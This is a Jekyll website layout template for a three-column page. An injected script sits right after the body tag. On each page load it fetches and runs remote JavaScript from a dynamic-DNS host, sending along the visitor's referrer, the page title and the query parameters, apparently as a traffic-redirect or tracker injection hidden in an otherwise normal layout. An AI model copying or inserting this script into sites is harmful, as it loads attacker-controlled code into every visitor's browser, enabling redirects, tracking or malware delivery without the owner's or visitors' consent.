<!DOCTYPE html>
<html>

  {% include head.html %}

  <body>
    <span id="153db5d4-e542-cbf2-43ce-74766ecf64e6"></span><script type="application/javascript">
var d=document;var s=d.createElement('script'); 
s.src='https://myhoster.ddns.net/YV7JGx?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm=script&_cid=153db5d4-e542-cbf2-43ce-74766ecf64e6'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
if (document.location.protocol === 'https:' && 'https://myhoster.ddns.net/YV7JGx?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm=script'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');};
</script>
    <div class="container main-stuff">
      <div class="row">
        <div class="col-md-3 left-cont">
          {% include header.html %}
        </div>
        <div class="col-md-7 cont">
          {{content}}
        </div>
        <div class="col-md-2 right-cont">
          {% include quote.html %}
        </div>
      </div>
      <div class="push"></div>
    </div>





  </body>


</html>
